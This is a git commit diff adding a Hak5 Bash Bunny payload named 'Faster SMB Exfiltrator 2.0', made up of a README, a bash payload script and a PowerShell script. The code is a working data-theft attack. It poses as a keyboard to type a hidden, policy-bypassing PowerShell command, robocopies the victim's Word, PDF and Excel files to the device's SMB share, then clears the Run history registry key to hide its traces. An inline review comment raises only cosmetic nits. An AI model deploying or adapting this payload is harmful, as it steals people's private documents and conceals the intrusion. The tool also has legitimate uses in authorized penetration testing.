commit
50e3d0639f
|
@ -0,0 +1,50 @@
|
|||
# Faster SMB Exfiltrator V 2.0
|
||||
|
||||
* Author: Hak5Darren
|
||||
* Props: ImNatho, mike111b, madbuda, jblk01
|
||||
* Version: Version 1.6.1
|
||||
* Target: Windows XP SP3+ (Powershell)
|
||||
* Category: Exfiltration
|
||||
* Attackmodes: HID, Ethernet
|
||||
|
||||
## Description
|
||||
|
||||
Exfiltrates select files from users's documents folder via SMB.
|
||||
Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
|
||||
|
||||
## Configuration
|
||||
|
||||
Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------- | -------------------------------------- |
|
||||
| Red (blinking) | Impacket not found in /pentest |
|
||||
| Yellow Single | Ethernet Stage |
|
||||
| Yellow Double | HID Stage |
|
||||
| Cyan | Receiving files |
|
||||
| White | Moving liberated files to mass storage |
|
||||
| Green | Finished |
|
||||
|
||||
# NOTICE
|
||||
|
||||
As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
|
||||
To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
|
||||
|
||||
# Starting from a fresh Bash Bunny
|
||||
|
||||
1. apt update ; apt install gcc
|
||||
2. pip install impacket
|
||||
3. cd /tools/
|
||||
4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||
5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||
6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
|
||||
|
||||
Both the username and the password have been set as 'user' and 'Password01' respectively.
|
||||
|
||||
# Changes to the payload.txt include:
|
||||
|
||||
* Support for SMB version 2 enabled.
|
||||
* Username and password set to bypass Microsoft's disallowing of anonymous access.
|
||||
* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.
|
|
@ -0,0 +1,85 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Faster SMB Exfiltrator version 2.0
|
||||
# Author: Hak5Darren
|
||||
# Props: ImNatho, mike111b, madbuda, jblk01
|
||||
# Version: 1.6.1
|
||||
# Category: Exfiltration
|
||||
# Target: Windows XP SP3+ (Powershell)
|
||||
# Attackmodes: HID, Ethernet
|
||||
#
|
||||
# REQUIREMENTS
|
||||
# ============
|
||||
# SETUP:
|
||||
#
|
||||
# 1. apt update ; apt install gcc
|
||||
# 2. pip install impacket
|
||||
# 3. cd /tools/
|
||||
# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||
# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||
#
|
||||
#
|
||||
# LED STATUS
|
||||
# ==========
|
||||
# FAIL........Failed to find dependencies
|
||||
# STAGE1......Ethernet Stage
|
||||
# STAGE2......HID Stage
|
||||
# SPECIAL.....Receiving Files
|
||||
# CLEANUP.....Moving Liberated Files
|
||||
# FINISH......Finished
|
||||
#
|
||||
# OPTIONS
|
||||
# =======
|
||||
# Exfiltration options configured from included s.ps1 script
|
||||
|
||||
|
||||
######## INITIALIZATION ########
|
||||
REQUIRETOOL impacket
|
||||
GET SWITCH_POSITION
|
||||
# Make temporary loot directory
|
||||
mkdir -p /loot/smb/
|
||||
# Delete any old exfiltration data
|
||||
rm -rf /loot/smb/*
|
||||
# Copy new powershell payload to smb share
|
||||
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
|
||||
# Make loot directory on USB Disk
|
||||
mkdir -p /root/udisk/loot/smb_exfiltrator
|
||||
|
||||
|
||||
######## ETHERNET STAGE ########
|
||||
LED STAGE1
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
# Start the SMB Server
|
||||
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
|
||||
|
||||
|
||||
######## HID STAGE ########
|
||||
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
|
||||
GET HOST_IP
|
||||
LED STAGE2
|
||||
ATTACKMODE HID RNDIS_ETHERNET
|
||||
RUN WIN powershell
|
||||
Q DELAY 1000
|
||||
Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
LED SPECIAL
|
||||
# Wait until files are done copying
|
||||
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
||||
|
||||
|
||||
######## CLEANUP ########
|
||||
LED CLEANUP
|
||||
# Delete EXFILTRATION_COMPLETE file
|
||||
rm -rf /loot/smb/EXFILTRATION_COMPLETE
|
||||
# Move files to udisk loot directory
|
||||
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
|
||||
# Clean up temporary loot directory
|
||||
rm -rf /loot/smb/e/*
|
||||
# Sync file system
|
||||
sync
|
||||
|
||||
|
||||
######## FINISH ########
|
||||
# Trap is clean
|
||||
LED FINISH
|
|
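Review bot: The header block contradicts itself: `# Title: Faster SMB Exfiltrator version 2.0` is followed two lines later by `# Version: 1.6.1`, and the README section above carries the same mismatched pair, so a reader cannot tell which number identifies this release; pick one and use it in both files. The HID-stage comment `# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1` documents a fixed address while the command under it is built from `$HOST_IP`; rewording it to `# Runs hidden powershell which executes \\$HOST_IP\s\s.ps1 (the address s.ps1 hard-codes must match)` keeps the two files' assumptions visible in one place. The unquoted `$SWITCH_POSITION` in the `cp` line is a quoting nit that ShellCheck would flag (`"$SWITCH_POSITION"`).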
@ -0,0 +1,9 @@
|
|||
$exfil_dir="$Env:UserProfile\Documents"
|
||||
$exfil_ext="*.docx"
|
||||
$exfil_ext1="*.pdf"
|
||||
$exfil_ext2="*.xlsx"
|
||||
$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
|
||||
mkdir $loot_dir
|
||||
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z
|
||||
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|